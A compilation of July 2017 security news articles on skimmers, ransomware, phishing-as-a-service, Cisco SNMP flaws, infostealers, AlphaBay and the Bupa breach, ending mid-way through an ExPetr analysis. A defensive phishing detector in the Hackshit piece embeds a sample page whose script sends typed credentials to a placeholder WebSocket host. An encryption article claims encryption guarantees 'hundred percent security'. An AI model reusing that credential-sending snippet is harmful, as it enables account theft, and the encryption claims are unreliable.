The KFOR news channel quoted a local police detective saying “the skimmer contains an antenna which transmits your card information to a tiny camera hidden somewhere outside the ATM.”

An insert skimmer retrieved from a compromised cash machine in Oklahoma City. Image: KrebsOnSecurity.com.

Krebs confirmed that financial industry sources told him that preliminary analysis of the insert skimmers used in the ATM attacks confirms they were equipped with technology to transmit stolen card data wirelessly to the hidden camera using infrared.

The insert skimmers used to compromise cash machines in Oklahoma City were paired with a hidden camera that was used to record time-stamped videos of ATM users entering their PINs and to receive the card data recorded and transmitted by the insert skimmer.

This design reduces the maintenance work the crooks have to do on the skimmers: when they need to replace the internal battery, for example, they can leave the device in the ATM slot and swap out only the hidden camera.

The skimmers are optimized to preserve battery life; according to Krebs, the insert skimmer uses an embedded battery that is turned on only when someone inserts a card into the ATM slot.

The spy cameras are deployed to remain hidden, crooks use tiny pinholes cut into false fascias that they install above or beside the PIN pad.
“Thieves involved in skimming attacks have hidden spy cameras in some pretty ingenious places, such as a brochure rack to the side of the cash machine or a safety mirror affixed above the cash machine (some ATMs legitimately place these mirrors so that customers will be alerted if someone is standing behind them at the machine).” wrote Krebs.

“More often than not, however, hidden cameras are placed behind tiny pinholes cut into false fascias that thieves install directly above or beside the PIN pad. Unfortunately, I don’t have a picture of a hidden camera used in the recent Oklahoma City insert skimming attacks.”

Let me suggest covering the PIN pad with your hand when you enter your PIN; in this case the hidden camera will not be able to record it. Krebs also warns of non-video methods to obtain the PIN (such as PIN pad overlays), but he explains that these devices are rare and more expensive for fraudsters.

If you are looking for more information about skimming devices, check out Brian Krebs’s series All About Skimmers.


NemucodAES ransomware and Kovter trojan bundled in the same campaigns
16.7.2017 securityaffairs
Ransomware

Security experts at the SANS Institute discovered that the NemucodAES ransomware and the Kovter trojan are being delivered together in spam campaigns.
Security experts at the SANS Institute Internet Storm Center discovered that two malware families, NemucodAES and Kovter, are being delivered together in .zip attachments distributed via active spam campaigns.

Security Researcher Brad Duncan noticed in the last couple of weeks a significant increase in malicious spam delivering .zip archives with JavaScript files used to download and execute the NemucodAES ransomware and Kovter click-fraud malware.

NemucodAES is a variant of the Nemucod Trojan downloader, known for being used in different campaigns in 2016 distributing Locky and TeslaCrypt ransomware.

“By March 2016, we started seeing reports of ‘Nemucod ransomware’ that stopped downloading ransomware binaries in favor of using its own script-based ransomware component,” Duncan wrote in a SANS Institute Internet Storm Center post published Friday.

“And now in July 2017, we see the next phase of Nemucod ransomware: NemucodAES. Emsisoft states this new variant is written in JavaScript and PHP. It uses AES and RSA to encrypt a victim’s files.”

The NemucodAES ransomware is easy to neutralize thanks to the availability of a decryptor; Kovter, on the other hand, is a fileless click-fraud malware that is hard to detect. Kovter has also been used by threat actors to steal personal information and to download and execute additional malicious payloads.

Spam campaigns deliver the malicious .zip archives disguised as notices from the United Parcel Service.

“Malspam with Zip archives containing JavaScript files are easy for most organizations to detect… But some of these messages might slip past your filtering, and some people could possibly get infected. With the NemucodAES decryptor, people can recover their files, but I expect this ransomware will continue to evolve,” Duncan wrote.

Kovter was packaged with other ransomware in past campaigns, in February, experts at Microsoft’s Malware Protection Center spotted malicious email campaigns using .lnk attachments to spread Locky ransomware and Kovter.

Back to the recent campaign, NemucodAES and Kovter were bundled in malicious .zip archives. When victims unpack the archives a JavaScript file is extracted.

“Network traffic was typical for an infection by one of the .js files. We first see HTTP requests for the NemucodAES JavaScript, followed by requests for various executables. Then we see the post-infection Kovter traffic. NemucodAES doesn’t generate any traffic on its own,” according to the research report.

The NemucodAES ransomware encrypts files without appending anything to the original file names, then it drops the decryption instructions (an .hta file) in the “AppData\Local\Temp” directory. It also sets a Windows desktop background (a .bmp file) as the ransom note.


Victims are requested to pay a $1,500 ransom in Bitcoin.

Experts are still investigating the role of the Kovter malware in these campaigns. For now, Kovter appears only to check in and generate command-and-control traffic.

“I see a lot of post-infection events for Kovter command and control traffic. But I’m not certain click-fraud is involved any more,” Duncan said.

Take a look at the SANS analysis for further details about this campaign.


How encryption can help startups in protecting their data
16.7.2017 securityaffairs Safety

The deployment of encryption in modern businesses not only guarantees hundred percent security, it also reduces the attack surface.
Data protection has become the top objective for many businesses in the world today, especially after the ransomware incident, the hacked credit card databases and the Apple leak. Businesses are scratching their heads, wondering what could hit them next.

It is a brilliant idea for executives to prioritize data protection over everything else. Nonetheless, it is equally difficult to harmonize security processes across several systems and devices. Even the most cautious and watchful business owners can leave data unprotected.

Encryption is widely regarded as one of the best solutions to this problem. The deployment of encryption on computers, cloud systems, mobile phones and other business avenues not only guarantees hundred percent security, it also substantially reduces the potential of being attacked and incurring financial loss.


How does encryption work?

Working in synergy with other security measures, encryption secures the data itself and its transfer to other parties. After being encrypted, a file becomes impossible to crack or decipher, and it becomes difficult to break into sensitive or valuable business information.

How can business owners encrypt their company’s data?

As a responsible and clever business owner, you must place a high emphasis on preventing data breaches and financial losses, and this can only be achieved by employing complete encryption of devices and the network. Encryption can be implemented and help in the following areas to protect your valuable data:

Wi-Fi Hotspots
A laptop acts as a blessing when traveling and you require access to company files, but using an unsecured Wi-Fi public hotspot can backfire pretty badly and make you vulnerable to attacks.

Emails
With email becoming the standard medium for the exchange of sensitive information, it is equally important to keep the process encrypted to avoid losing information to data thieves. All businesses should engage in premium level encryption to protect their data, irrespective of whether probable hackers possess physical access to computers or not.

Passwords
Your password is an essential element of encryption. To make the password hack-proof, make it long; 10 or more characters is advisable. It should consist of both upper and lower case letters, numbers, and special characters. It is recommended to keep separate passwords for each system and device, and to document them in a safe place if remembering them is too hard.

Cloud
Despite attractions such as affordability, convenience, and sharing, cloud storage solutions are quite vulnerable to external attacks. Dropbox and other big names in the cloud storage scene offer built-in encryption of the data stored on their servers. The point to be highlighted here, though, is that they also hold the decryption keys, which in certain situations might be used to access your stored information. There are many products that add an extra protection layer to cloud storage locations.

Search Engines
Like it or not, Google, Yahoo, and other search engines will catalog every search you perform on the internet. Your online search choices are then attached to your computer’s IP address and are subsequently used to customize the advertising and searches for your machine. This cataloging might seem unobtrusive and perhaps even useful, but it is also a risk of future public embarrassment and social faux pas. Don’t let these search engines store your searches for ‘anti-depressants,’ ‘love advice,’ ‘divorce lawyers,’ and ‘anger management’. To avoid it, a VPN browser can help you cloak your IP address so you can keep your private searches private. If you are connected to a VPN, your online traffic is redirected to a third-party server, which encrypts the information.

USB and External Drives
Portable data storage and plug and play devices sure are useful, but they come with the risk of theft or loss. Fortunately, products such as BitLocker To Go keep portable storage drives encrypted if they fall into the wrong hands.

A password to open a company PC would be useless if someone can get away with the hard disk. All it would take is to connect the hard drive to another system and, alas, all the data is right there. To avoid this mishap, Microsoft’s BitLocker software for Windows 7 Ultimate or Vista (or the Enterprise or Pro editions of Windows 8) offers full hard drive encryption. To turn on the feature, just go to Control Panel > System and Security > BitLocker Drive Encryption.

In a Nutshell…

Guarding your sensitive information against theft and vulnerability isn’t a tough task in today’s digital world, particularly with the progressive adoption of cloud computing. The fact of the matter is that, despite all the security measures, hackers and cyber criminals can sometimes still find their way into a company’s or individual’s system, exposing it to data theft or data leakage.

For that reason, it is advisable to consider carefully what (and when) you want to save in the cloud, and to consult with a professional cloud services provider to find out what encryption level suits you best.

In the modern business environment, which is increasingly dependent on computers and cloud-based storage, nothing is, or at least should be, dearer to you than a rock-solid encryption strategy that can ensure your long-term safety and success.


Hackshit PhaaS platform makes it even easier to run phishing campaigns
16.7.2017 securityaffairs
Phishing

The experts from Netskope Threat Research Labs discovered the Hackshit PhaaS platform, another interesting case of crimeware-as-a-service.
A few days ago, we discussed the Katyusha scanner, a powerful and fully automated SQLi vulnerability scanner discovered by researchers at security firm Recorded Future that was available for $500 in the cyber crime underground.

The Katyusha scanner is just one of the numerous hacking tools and crimeware-as-a-service available in the hacking community.

Today I want to present another crimeware-as-a-service that was discovered by the experts from Netskope Threat Research Labs, dubbed Hackshit.

Hackshit is a Phishing-as-a-Service (PhaaS) platform that offers a low cost, “automated solution for the beginner scammers”; it allows wannabe crooks to easily launch a phishing campaign.

Dubbed Hackshit, the PhaaS platform attracts new subscribers by offering them free trial accounts to review their limited set of hacking tutorials and tricks to make easy money.

“Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of ‘The marketing of products or services deemed’. The victim’s credentials are sent to the Hackshit PhaaS platform via websockets.” states a blog post published by Netskope.

The researchers discovered the PhaaS platform during research on trends in CloudPhishing attacks. They observed a phishing page using the data URI scheme to serve base64 encoded content (data:text/html;base64) delivered from “https://a.safe.moe”; when they accessed the link, the researchers were presented with a phished login page for Google Docs.

Once the victims have provided their credentials, they are presented with another phishing page whose source again uses a data URI scheme to serve base64 encoded content (data:text/html;base64) from https://a.safe.moe.

This second phished page was designed to trick victims into providing recovery details of their email account. Once the victim has provided his details, he is redirected to the original Google recovery page.

The experts decoded the two phishing pages and discovered that the credentials are sent to the attacker via a websocket to https://pod[.]logshit[.]com and https://pod-1[.]logshit[.]com.
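The decoding step the researchers performed can be automated on the defender's side. The following Python is an added example, not Netskope's tooling: it unpacks a data: URI, then flags the combination described above (an HTML document carrying a password field that opens a WebSocket). The sample page and the wss:// host are constructed for illustration and are not the real Hackshit endpoints.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample in the style Netskope described: a login-looking page hidden in a
# base64 data URI that ships typed credentials over a WebSocket. The host is a reserved
# example name, not the real Hackshit collector.
SAMPLE_HTML = """<html><body>
<form id="login"><input name="email"><input type="password" name="passwd"></form>
<script>
var ws = new WebSocket("wss://pod.example.invalid/collect");
document.getElementById("login").onsubmit = function () {
  ws.send(JSON.stringify({e: email.value, p: passwd.value}));
  return false;
};
</script></body></html>"""
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML.encode()).decode()

# A harmless page in the same packaging, to show the check does not fire on data URIs alone.
BENIGN_DATA_URI = "data:text/html;base64," + base64.b64encode(b"<p>hello</p>").decode()

# data:[<mime>][;param...],<payload>
DATA_URI_RE = re.compile(r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]+)*),(?P<payload>.*)$", re.S)
WS_RE = re.compile(r"""wss?://[A-Za-z0-9.\-]+(?::\d+)?[^\s"'<>]*""")
PASSWORD_INPUT_RE = re.compile(r"""<input[^>]*type\s*=\s*["']?password""", re.I)


def decode_data_uri(uri):
    """Return (mime, text) for a data: URI; handles base64 and percent-encoded payloads."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        raise ValueError("not a data URI")
    params = [p.lower() for p in m.group("params").split(";") if p]
    payload = m.group("payload")
    if "base64" in params:
        # Re-pad defensively: some generators strip the trailing '='.
        raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
    else:
        raw = unquote(payload).encode()
    mime = m.group("mime").lower() or "text/plain"
    return mime, raw.decode("utf-8", errors="replace")


def analyze_data_uri(uri):
    """Flag an HTML document delivered as a data URI that asks for a password and
    talks to a WebSocket endpoint, the pattern the write-up describes."""
    mime, html = decode_data_uri(uri)
    endpoints = sorted(set(WS_RE.findall(html)))
    has_password = PASSWORD_INPUT_RE.search(html) is not None
    return {
        "mime": mime,
        "password_field": has_password,
        "websocket_endpoints": endpoints,
        "suspicious": mime == "text/html" and has_password and bool(endpoints),
    }


if __name__ == "__main__":
    print(analyze_data_uri(SAMPLE_DATA_URI))
```

The WebSocket hosts it extracts are the values worth feeding into proxy or DNS blocklists.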

“Accessing logshit[.]com led us to the discovery of the PhaaS website named Hackshit as shown in Figure 6. Further research concluded the website is serving as a PhaaS platform.” continues the blog post.


Hackshit is a PhaaS platform that offers several phishing services and it also implements a black marketplace to buy and sell such kind of services.

“The marketplace is a portal that offers services to purchase and sell for carrying out the phishing attacks,” Netskope researcher Ashwin Vamshi explained.

“The attacker then generates a phished page from the page/generator link and logs into the email account of the compromised victim, views all the contacts and sends an email embedded with the phished link.”

Crooks can purchase site login accounts of compromised victims from the marketplace using Perfect Money or bitcoins.

Using Hackshit, subscribers can easily generate their own phishing pages for many popular services, including Yahoo, Facebook, and Gmail.

Experts also noticed that the Hackshit website uses an SSL certificate issued by the open certificate authority Let’s Encrypt.

As for the pricing model behind the PhaaS, Hackshit offers several subscription tiers from Starter to Master, ranging from 40 USD per week to 250 USD for 2 months.

Hackshit demonstrates that crimeware-as-a-service represents a serious risk for businesses and end-users, as it brings wannabe hackers into the cybercrime arena.


CISCO issues security patches for nine serious RCEs in SNMP subsystem in IOS and IOS XE
15.7.2017 securityaffairs
Vulnerability

Cisco has fixed nine serious remote code execution flaws in the SNMP subsystem running in all the releases of IOS and IOS XE software.
The tech giant publicly disclosed the vulnerabilities on June 29 and provided workarounds; now it is notifying customers about the availability of security patches.

The nine issues, tracked as CVE-2017-6736 through CVE-2017-6744, were all patched by the company. All the flaws could be exploited by a remote attacker (authenticated with the device’s SNMP community string, per the advisory) by sending specially crafted SNMP packets, resulting in arbitrary code execution or causing the system to reload.

“The Simple Network Management Protocol (SNMP) subsystem of Cisco IOS and IOS XE Software contains multiple vulnerabilities that could allow an authenticated, remote attacker to remotely execute code on an affected system or cause an affected system to reload. An attacker could exploit these vulnerabilities by sending a crafted SNMP packet to an affected system via IPv4 or IPv6. Only traffic directed to an affected system can be used to exploit these vulnerabilities.” states the advisory published by CISCO in June.

The experts warned of nine flaws affecting the Simple Network Management Protocol (SNMP) component of IOS and IOS XE software.

The flaws are due to a buffer overflow condition in the SNMP subsystem, all versions of SNMP – Versions 1, 2c, and 3 are affected.


As reported by the advisory, an authenticated attacker who knows the SNMP read-only community string of a target system could remotely execute code or cause the device to reload by sending a specially crafted SNMP packet via IPv4 or IPv6.

The attack is very dangerous because hackers could obtain full control of vulnerable devices, and the worst news is that Cisco warned customers that attackers in the wild know about the vulnerabilities and could exploit them at any moment.

“A successful exploit could allow the attacker to execute arbitrary code and obtain full control of the affected system or cause the affected system to reload,” Cisco said in its advisory.

Cisco confirmed that any device configured with one of a list of particular management information bases (MIBs) is vulnerable. MIBs are databases associated with SNMP implementations and are used to manage devices in a communication network.

When Cisco disclosed the issues, its original workaround recommendation was to disable the affected MIBs.

Devices configured with any of the following MIBs are vulnerable:

ADSL-LINE-MIB
ALPS-MIB
CISCO-ADSL-DMT-LINE-MIB
CISCO-BSTUN-MIB
CISCO-MAC-AUTH-BYPASS-MIB
CISCO-SLB-EXT-MIB
CISCO-VOICE-DNIS-MIB
CISCO-VOICE-NUMBER-EXPANSION-MIB
TN3270E-RT-MIB
“Some of the MIBs may not be present on all systems or versions but are enabled when present,” continued the Cisco advisory.

“Administrators may be accustomed to utilizing the show snmp mib command in privileged EXEC mode to display a list of enabled MIBs on a device,” Cisco said. “Not all of the MIBs will be displayed in the output of the show snmp mib command but may still be enabled.” Customers were advised to implement the entire exclude list.

Cisco customers need to apply the patches; the company also recommends that network managers regularly change the community strings, which are used to restrict read/write access to SNMP data on a device running IOS or IOS XE.

“These community strings, as with all passwords, should be chosen carefully to ensure they are not trivial,” Cisco said. “They should also be changed at regular intervals and in accordance with network security policies.”
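The advisory's guidance (non-trivial community strings, rotated regularly, plus the MIB exclude list) can be audited from a running-config. The following Python is an added example, not Cisco's tooling: it parses `snmp-server community` and `snmp-server view` lines and flags trivial strings, read-write communities, communities with no access-list, and communities not bound to a view with exclusions. The config excerpt, the view name and the excluded OID are constructed for illustration; take the actual objects to exclude from Cisco's advisory.

```python
import re

# Constructed IOS running-config excerpt (not from the advisory). Three communities:
# a vendor default, a read-write string, and one bound to a view that excludes an OID.
SAMPLE_CONFIG = """
snmp-server community public RO
snmp-server community s3cret-RW RW 10
snmp-server community Xy7q-RO view NO_BAD_SNMP RO 10
snmp-server view NO_BAD_SNMP iso included
snmp-server view NO_BAD_SNMP 1.3.6.1.2.1.10.94 excluded
access-list 10 permit 192.0.2.10
"""

# Assumed list of strings any auditor would call "trivial"; extend to local policy.
TRIVIAL_STRINGS = {"public", "private", "cisco", "admin", "snmp", "secret"}

# snmp-server community <string> [view <name>] [RO|RW] [<acl>]   (RO is the default)
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?: view (\S+))?(?: (RO|RW))?(?: (\S+))?$", re.I)
# snmp-server view <name> <object-or-oid> included|excluded
VIEW_RE = re.compile(r"^snmp-server view (\S+) (\S+) (included|excluded)$", re.I)


def parse_snmp_config(config_text):
    """Return (communities, views): a list of (string, view, access, acl) tuples and a
    mapping view-name -> [(object, action), ...]."""
    communities, views = [], {}
    for raw in config_text.splitlines():
        line = raw.strip()
        m = VIEW_RE.match(line)
        if m:
            views.setdefault(m.group(1), []).append((m.group(2), m.group(3).lower()))
            continue
        m = COMMUNITY_RE.match(line)
        if m:
            string, view, access, acl = m.groups()
            communities.append((string, view, (access or "RO").upper(), acl))
    return communities, views


def audit_snmp_config(config_text):
    """Map each community string to the list of weaknesses found for it."""
    communities, views = parse_snmp_config(config_text)
    report = {}
    for string, view, access, acl in communities:
        issues = []
        if string.lower() in TRIVIAL_STRINGS:
            issues.append("trivial community string")
        if access == "RW":
            issues.append("read-write access exposed")
        if acl is None:
            issues.append("no access-list restricting SNMP sources")
        excluded = [obj for obj, action in views.get(view, []) if action == "excluded"]
        if not excluded:
            issues.append("not bound to a view that excludes the affected MIB objects")
        report[string] = issues
    return report


if __name__ == "__main__":
    for community, issues in audit_snmp_config(SAMPLE_CONFIG).items():
        print(community, "->", issues or ["ok"])
```

This checks configuration intent only; as the advisory notes, a MIB absent from `show snmp mib` output may still be enabled, so patching remains the fix.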


Ovidiy Stealer a cheap and efficient infostealer offered for sale
15.7.2017 securityaffairs
Virus

A new infostealer malware dubbed Ovidiy Stealer was offered for sale by a Russia-speaking malware developer that goes online with the moniker “TheBottle.”
TheBottle has advertised the malware on various cybercrime forums.

The Ovidiy Stealer was first spotted in June 2017; according to the experts at security firm Proofpoint, the malware is under active development and is gaining popularity in the cyber criminal underground.

“Proofpoint threat researchers recently analyzed Ovidiy Stealer, a previously undocumented credential stealer which appears to be marketed primarily in the Russian-speaking regions. It is under constant development, with several updated versions appearing since the original samples were observed in June 2017. The growing number of samples demonstrate that criminals are actively adopting this malware.” states the analysis published by Proofpoint.


The infostealer is offered for sale on a Russian website for 450-750 Rubles ($7-$13); according to the malware researchers, the low price reflects the fact that the malware isn’t as effective as other malicious codes available on the market.

Malware experts at Proofpoint discovered the Ovidiy Stealer is currently being spread via email as executable attachments, compressed executable attachments, and links to an executable download.

“It is also likely spread via file hosting / cracking / keygen sites, where it poses as other software or tools. In several cases, we observed the Ovidiy Stealer bundled with a “LiteBitcoin” installer, further validating this claim.” continues the analysis.

The experts say the Ovidiy Stealer is not complex: it does not persist across reboots and currently implements only a few features.

It can collect and steal information from many popular applications, including:

FileZilla
Google Chrome
Kometa browser
Amigo browser
Torch browser
Orbitum browser
Opera browser
Once the malware has siphoned the information from the victims, it sends it back to a control panel that all the subscribers use to access their data. The panel is published on the same server that hosts the website, at ovidiystealer.ru, an operational choice that shows the author’s lack of experience.

Another of TheBottle’s mistakes is the use of RoboKassa for payments, a PayPal-like payment processor based in Russia that does not ensure users’ anonymity.

“Ovidiy Stealer is a new password stealer that entered the criminal ranks barely one month ago. While it is not the most advanced stealer we have seen, marketing and an entry-level price scheme make it attractive and accessible to many would-be criminals. Ovidiy Stealer is lightweight and simple enough to work with relative ease, allowing for simple and efficient credential exfiltration.” concluded Proofpoint. “A lightweight, easy-to-use, and effective product coupled with frequent updates and a stable support system give Ovidiy Stealer the potential to become a much more widespread threat.”


Risk Intelligence Firm Flashpoint Raises $28 Million

15.7.2017 securityweek Security

Flashpoint, a New York, NY-based threat intelligence and research company that focuses on what it calls “Business Risk Intelligence” (BRI) gleaned from combing the Deep & Dark Web, has raised $28 million in Series C funding.

The company goes beyond what many traditional cyber threat intelligence providers collect, which typically includes technical indicators such as IP addresses, domains, and signatures. Flashpoint collects information and monitors conversations in the underground, including cybercriminal groups and terrorist organizations such as the Islamic State (Daesh) and its supporters.

According to the company, the additional funding will help support adoption of its BRI offerings and support the recruitment of additional threat intelligence analysts.

As Flashpoint explains, the company provides customers with “visibility into real threats with the potential to harm them and the context to help them understand how these threats could impact their business.”

"Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," warned Flashpoint in its Business Risk Intelligence - Decision Report, published in January 2017. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

Flashpoint says its customer base includes industries such as finance, retail, insurance, healthcare, law, media, energy, technology, telecommunications, defense, aviation, entertainment, hospitality, consumer goods, and manufacturing. The company counts several Fortune 500 and government organizations as customers.

Led by new investor Georgian Partners, the Series C round also included Greycroft Partners, TechOperators, Leaders Fund, Jump Capital, Bloomberg Beta, and Cisco Investments. Robert Herjavec, founder and CEO of security firm Herjavec Group and investor on ABC's hit show Shark Tank, was an early investor in the company, SecurityWeek has confirmed.

The company previously raised $10 million in Series B funding in July 2016 and announced its expansion from cyber threat intelligence into business risk intelligence.

Josh Lefkowitz, CEO and co-founder of Flashpoint, is a SecurityWeek columnist.


Atlassian Launches Public Bug Bounty Program

15.7.2017 securityweek Security

Team collaboration and productivity software provider Atlassian announced this week the launch of a Bugcrowd-based public bug bounty program with rewards of up to $3,000 per vulnerability.

Atlassian has been running a private bug bounty program and the company has now decided to take advantage of all the 60,000 researchers who have signed up on the Bugcrowd platform to help find security holes in its products.

The initiative covers the Confluence and JIRA products, including the Android and iOS mobile apps, and the *.atlassian.io domains hosting services that interact with the company’s products. Bug bounty hunters will have to create their own Atlassian cloud instances using their Bugcrowd email address.

Other products, the Atlassian websites, customer cloud instances, billing systems, internal or development services, and third-party add-ons are out of scope.

The company is interested in cross-instance data leakage and access, remote code execution, server-side request forgery (SSRF), reflected and stored cross-site scripting (XSS), cross-site request forgery (CSRF), SQL injection, XML external entity (XXE), access control, and directory traversal flaws.

As for rewards, most of the targeted products qualify for “tier 1” rewards. Critical vulnerabilities in these products can earn researchers up to $3,000, while the least serious flaws are worth $100. Confluence Team Calendars is the only “tier 2” product and the maximum reward is $1,500 per flaw.

Since the launch of its bug bounty program, Atlassian has paid out rewards for 39 vulnerabilities, with the average payout at roughly $500.

“The economics of bug bounties are too overwhelming to ignore,” said Daniel Grzelak, head of security at Atlassian. “Our traditional application security practice produces great results early in the lifecycle and deep in our services, but the breadth and depth of post-implementation assurance provided by the crowd really completes the secure development lifecycle. Multiplying the specialization of a single bounty hunter by the size of the crowd creates a capability that just can’t be replicated by individual organizations.”


Dark Web Market AlphaBay Goes Down

15.7.2017 securityweek CyberCrime

AlphaBay, a Dark Web marketplace for illegal products, went down last week after authorities seized equipment following raids in three different countries.

Following the incident, vendors selling their products on AlphaBay began to flock to other Dark Web marketplaces, a transition that apparently started to cause technical issues on some of these portals. AlphaBay supposedly had over 400,000 users last week.

AlphaBay was the most popular marketplace on the Dark Web, followed by RAMP (Russian), Dream Market, Hansa Market, and Silk road 3.1. Launched in December 2014 and already having over 200,000 users by October 2015, AlphaBay saw an influx of users after a similar portal called TheRealDeal disappeared last summer.

The exact reason for AlphaBay’s demise remains unclear at the moment, but there is some speculation that its admins might have pulled off an exit scam, shutting down the portal and stealing crypto-currency from escrow wallets, BleepingComputer’s Catalin Cimpanu notes.

Others, however, suggest the marketplace was taken down after authorities raided various locations in the United States, Canada and Thailand on July 5. AlphaBay went down the same day the raids happened, and the Wall Street Journal reports the law enforcement operation resulted in the portal’s shutdown.

Authorities apparently confirmed three raids in Canada and another in Thailand, but didn’t confirm that they were related to the Dark Web marketplace. While only equipment was reportedly seized in Canada, Alexander Cazes, 26, was arrested in Thailand, where authorities seized assets valued at over $11 million.

Cazes, supposedly the individual running AlphaBay, allegedly gave his consent to be extradited to the United States after a request from the Federal Bureau of Investigation. On Wednesday morning, he was found dead in his cell at the Narcotics Suppression Bureau in Bangkok's Laksi district.

Ilia Kolochenko, CEO of web security company High-Tech Bridge, pointed out in an emailed comment to SecurityWeek that, although there’s no safe harbor for cybercriminals operating illegal marketplaces such as AlphaBay, the portal’s demise is likely to result in miscreants taking measures to better secure their operations.

“Dark Web gives an illusion of safety and anonymity to many unexperienced users. This case is a good example that there is no safe harbor for cybercrime marketplaces operating on the global scale. Users erroneously believe that bitcoin or tor can assure their undetectability, but this assumption is wrong. There are many other ways to trace and unmask them via weaknesses in tangential technologies, or just by using social engineering or even their own garrulity against them,” Kolochenko said.

Last year, 35-year-old Aaron James Glende from Winona, Minnesota, was sentenced to four years and two months in prison for selling stolen information on AlphaBay. In January this year, a Reddit user demonstrated he could read any private message on the dark web marketplace.

“However, this news is rather a bad one in the long run. I think, other illegal market places will quickly learn the lesson and take all measures to secure their platforms and operators. We will probably see many new smaller places restricted only to ‘trusted’ sellers and verified buyers. This will seriously impede any further investigation and police raids,” Kolochenko concluded.

Earlier this year, darknet marketplace Hansa announced the launch of a bug bounty program with rewards of up to 10 bitcoins, in an effort to minimize chances of the website being hacked.


Insider Steals Customer Data From Global Healthcare Group

15.7.2017 securityweek Incident

Major International Healthcare Organization Bupa Loses Customer Details to Insider Threat

Bupa, a major international healthcare group, announced yesterday, "We recently discovered an employee of our international health insurance division (which is called 'Bupa Global'), had inappropriately copied and removed some customer information from the company."

Sheldon Kenton, Managing Director at Bupa Global, announced, "Around 108,000 international health insurance policies are affected," and added, "The data taken includes: names, dates of birth, nationalities, and some contact and administrative details including Bupa insurance membership numbers."

DataBreaches soon added some detail. "DataBreaches.net first became aware of the Bupa breach on June 23, when a listing appeared on the now-gone Alpha Bay marketplace by a vendor calling himself 'MoZeal'." MoZeal was a new member to AlphaBay, having joined on 2 May 2017; and DataBreaches conjectures "that 'MoZeal' is likely the rogue employee that Kenton referred to."

DataBreaches provided the full list of stolen data as provided by MoZeal, which turns out to be more expansive than that provided by Bupa. It includes separate home and office fax, email address, mobile and landline phone numbers. DataBreaches also questions the Bupa statement. "While Bupa reports that 108,000 were affected, MoZeal's listing and thread indicated that there were over 130,000 in the U.K. alone, and that overall there were about 500,000 – 1 million records for sale."

SecurityWeek asked Bupa to clarify this, and was told, "All of the information and statements we have made public this week remain valid. We are aware of a report that suggests that on 23 June 2017 'a former employee claimed to have 1m records for sale'. Our thorough investigation established that 108,000 policies, covering 547,000 customers, had been copied and removed. The disparity in numbers claimed and those taken relates to duplicate copies of some records."

For now, Bupa is providing little more information. It is contacting those customers who are affected "to apologize and advise them as we believe the information has been made available to other parties." This implies that affected customers should be particularly wary about phishing attempts seeking additional information, either for complete identity theft or just to steal bank account details or card numbers.

Earlier this week, Kaspersky Lab published a study on "The Human Factor in IT Security", showing the extent to which employees are making businesses vulnerable from within. Kaspersky's principal security researcher David Emm believes employees rank at the very top of the list of threats to data and systems. "When insider-assisted attacks do occur," he told SecurityWeek, "the impact of such attacks can be devastating as they provide a direct route to the most valuable information -- in this case, customer data."

David Kennerley, director of threat research at Webroot, adds, "Because of the nature of the information that's been leaked, Bupa Global customers who have been affected need to be extra vigilant; without doubt they are now prime targets for phishing attacks and other targeted activities, as well as possible identity theft."

The potency of identity theft should not be underestimated. On Monday this week Alf Goransson -- the CEO of Securitas, Sweden's largest security firm -- was declared bankrupt by the Stockholm District Court (it is expected to be rescinded). A fraudulent loan had been taken out in his name in April after his identity was stolen at the end of March. The perpetrator also used his name to request bankruptcy. The bankruptcy led to Goransson's automatic deregistration by the Swedish Companies Registration Office as the Securitas CEO.

In the Bupa incident, the perpetrator is known and has been dismissed, and Bupa is taking 'appropriate legal action'. In response to SecurityWeek's request for clarity, Bupa said, "It was an existing employee." It was neither an ex-employee, nor a contractor. "Just to reiterate," continued Bupa, "the employee had access to this information as part of their job and chose to abuse their position. The employee responsible has been dismissed. Bupa has a zero-tolerance attitude towards data theft."

Bupa has not said how it discovered the breach, whether it was via its own internal controls or because a third-party (such as law enforcement) recognized it on the dark web. Nor has it said exactly when it discovered the breach, nor when it dismissed the employee.

The UK data protection regulator, the Information Commissioner's Office (ICO), confirmed that it knows about the incident and told SecurityWeek, "Organizations have a duty to protect people's privacy and personal data. We have been made aware of an issue involving Bupa Global and are making enquiries." However, the ICO declined to tell SecurityWeek when it had been informed of the breach.

Since DataBreaches knew about the loss on 23 June, it is likely that Bupa knew about it around the same time. That implies that the AlphaBay takedown occurred after MoZeal's offer to sell Bupa data and before Bupa disclosed the loss. The timing is most probably coincidental; nevertheless, the only SecurityWeek question that Bupa completely ignored was this: "Does the theft of your data and its subsequent offer for sale on AlphaBay have anything whatsoever to do with AlphaBay being taken down?" When companies limit the information they provide in their disclosures, there is a great temptation to fill in the gaps.


No Free Pass for ExPetr
14.7.2017 Kaspersky
Ransomware
Recently there has been discussion of the claim that, if our product is installed, ExPetr will not write to the MBR the special malicious code that encrypts the MFT. Some have even speculated that some kind of conspiracy might be ongoing. Others have pointed out it’s plain and simple nonsense. As usual, Vesselin Bontchev, a legend in IT security who has become famous for usually getting things right, said it best:

So, what is going on here? As a wise man once said, “the code doesn’t lie,” so let’s analyze the ExPetr MBR disk infection/wiping code in detail.

In a nutshell, the malware does these actions:
Checks for administrator privileges
Enumerates running processes
Depending on the processes found, initializes a special runtime config
Depending on this runtime config, chooses which execution branches to take


The malware’s main function

The “check privileges” function

An interesting fact is that the malware tries to find several running processes (it computes a hash of each running process name and compares it with several hard-coded values).

Enumerating running processes

The most interesting part happens here:

After this condition, two malicious functions can be executed:
InfectMbr: This routine writes the malicious GoldenEye encryptor code to the MBR. After reboot, this code encrypts the MFT and 1024 bytes of each file.
